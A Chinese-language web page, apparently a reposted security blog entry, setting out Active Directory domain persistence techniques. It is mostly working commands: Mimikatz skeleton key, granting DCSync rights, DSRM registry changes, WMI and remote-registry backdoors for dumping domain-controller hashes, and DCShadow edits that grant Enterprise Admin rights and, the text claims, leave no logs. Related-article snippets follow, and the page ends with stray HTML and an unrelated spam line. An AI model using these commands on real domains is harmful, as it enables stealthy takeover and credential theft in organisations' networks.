<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    域滲透攻擊

    VSole2021-10-07 06:11:36

    域持久性

            必須以DA權限運行

    Mimikatz攻擊

            DC運行為所有用戶啟用密碼 "mimikatz"

    privilege::debug
    misc::skeleton
    

    使用 PowerView 授予特定用戶 DCSync 權限

            選擇的用戶授予 DCSync 的權限,在某些設置中可能會逃避檢測。

    Add-ObjectACL -TargetDistinguishedName "dc=targetdomain,dc=com" -PrincipalSamAccountName BackdoorUser -Rights DCSync
    

    域控制器 DSRM 管理員

           DSRM 管理員是 DC 的本地管理員帳戶,需要先啟用遠程登錄。

    New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD
    

    現在我們可以使用之前轉儲在 DC 上的本地管理哈希遠程登錄,使用例如“ overpass -the-hash”來獲取會話。

    修改遠程 WMI 訪問的安全描述符

            使用Nishang 的 Set-RemoteWMI cmdlet授予用戶 WMI 訪問計算機的權限。可以運行以持久訪問例如 DC。

    Set-RemoteWMI -UserName BackdoorUser -ComputerName dc.targetdomain.com -namespace 'root\cimv2'
    

    DAMP 修改 DC 注冊表安全描述符以進行遠程hash檢索

            使用DAMP工具我們就可以借殼DC注冊表來給我們上的訪問SAM,SYSTEM以及SECURITY注冊表配置單元,這允許我們遠程轉儲 DChash。

    Add-RemoteRegBackdoor -ComputerName dc.targetdomain.com -Trustee BackdoorUser
    

            我們使用Add-RemoteRegBackdoor.ps1來自 DAMP的cmdlet添加后門。

    # Get machine account hash for silver ticket attack
    Get-RemoteMachineAccountHash -ComputerName DC01
    
    # Get local account hashes
    Get-RemoteLocalAccountHash -ComputerName DC01
    
    # Get cached credentials (if any)
    Get-RemoteCachedCredential -ComputerName DC01
    

    DCShadow

              DCShadow是一種攻擊,它通過暫時模仿一個域控制器來掩蓋某些行動。如果你在一個根域中擁有域管理員或企業管理員的權限,它可以被用于森林級的持久化。

            作為域管理員,可以選擇給一個選定的用戶以DCShadow攻擊所需的權限(使用Set-DCShadowPermissions.ps1 cmdlet)

    Set-DCShadowPermissions -FakeDC BackdoorMachine -SamAccountName TargetUser -Username BackdoorUser -Verbose
    

    然后,從任何一臺機器上使用Mimikatz來進行DCShadow攻擊。

    # Set SPN for user
    lsadump::dcshadow /object:TargetUser /attribute:servicePrincipalName /value:"SuperHacker/ServicePrincipalThingey"
    
    # Set SID History for user (effectively granting them Enterprise Admin rights)
    lsadump::dcshadow /object:TargetUser /attribute:SIDHistory /value:S-1-5-21-280534878-1496970234-700767426-519
    
    # Set Full Control permissions on AdminSDHolder container for user
    ## Requires retrieval of current ACL:
    (New-Object System.DirectoryServices.DirectoryEntry("LDAP://CN=AdminSDHolder,CN=System,DC=targetdomain,DC=com")).psbase.ObjectSecurity.sddl
    
    ## Then get target user SID:
    Get-NetUser -UserName BackdoorUser | select objectsid
    
    ## Finally, add full control primitive (A;;CCDCLCSWRPWPLOCRRCWDWO;;;[SID]) for user
    lsadump::dcshadow /object:CN=AdminSDHolder,CN=System,DC=targetdomain,DC=com /attribute:ntSecurityDescriptor /value:O:DAG:DAD:PAI(A;;LCRPLORC;;;AU)[...currentACL...](A;;CCDCLCSWRPWPLOCRRCWDWO;;;[[S-1-5-21-1874506631-3219952063-538504511-45109]])
    

    最后,從DA會話或之前提供DCShadow權限的用戶會話,運行DCShadow攻擊。之前的動作將被執行,不會留下任何日志。

    lsadump::dcshadow /push
    
    dc
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    本文對如何利用 DCOM 進行橫向移動的手法進行了總結,希望可以對大家的學習提供一些幫助。
    DC-3靶場實戰詳解
    2023-02-15 10:42:44
    雷神眾測-杭州亞運會官方指定安全眾測服務平臺
    九種DC靶機滲透測試
    2023-01-07 11:14:37
    點擊上方藍字 關注安全知識DC-1靶機測試1.DC-1靶機安裝安裝進去后,修改網絡設置為nat模式2.靶機
    靶場攻略 | vulhub_DC6
    2022-11-14 10:30:50
    DC-6是一個易受攻擊的實驗環境,最終目的是讓入侵者獲得root權限,并讀取flag。通過tweet可以聯系到作者@DCAU7。DC_6使用的操作系統為Debian 64位,可以在VirtualBox、VMware上直接運行。ssh成功進行了登錄,此時登錄用戶為graham。發現能夠以jens用戶,不使用口令執行情況下執行backups.sh。打開文件backups.sh為一個文件減壓的命令行,可將減壓指令刪除,換成/bin/bash 以jens用戶去執行操作。
    DCMM快問快答
    2022-05-06 14:25:14
    DCMM評估以整個企業為對象,面向企業整體進行評估,一般由數據管理歸口部門牽頭,其他部門配合開展工作。目前中國電子信息行業聯合會發布了12家評估機構,持續增強市場服務能力和評估工作的活力。目前中國信通院DCMM評估團隊統一以“南京新一代人工智能研究院有限公司”對外提供DCMM評估服務,通過聯系南京新一代人工智能研究院有限公司、中國信息通信研究院、泰爾認證中心有限公司均可到聯系到評估服務團隊。
    導出域內所有用戶的信息。該工具的原理是首先使用提供的用戶登錄憑據通過 smbexec 或者 wmiexec 遠程連接至域控制器并獲得高權限,進而從注冊表中導出本地帳戶的哈希,同時通過 Dcsync 或從 NTDS.dit 文件中導出所有域用戶的哈希。
    Dcsync在域環境中,不同域控制器之間,每 15 分鐘都會有一次域數據的同步。如果需要同步的數據比較多,則會重復上述過程。
    DCOM在滲透中的利用
    2021-09-18 07:05:34
    COM 是 Windows 的一個組件,可促進軟件之間的互操作性,DCOM 使用遠程過程調用 (RPC) 將其擴展到整個網絡。
    分布式組件對象模型(DCOM)遠程協議是一種通過遠程調用(RPC)公開應用程序對象的協議。
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类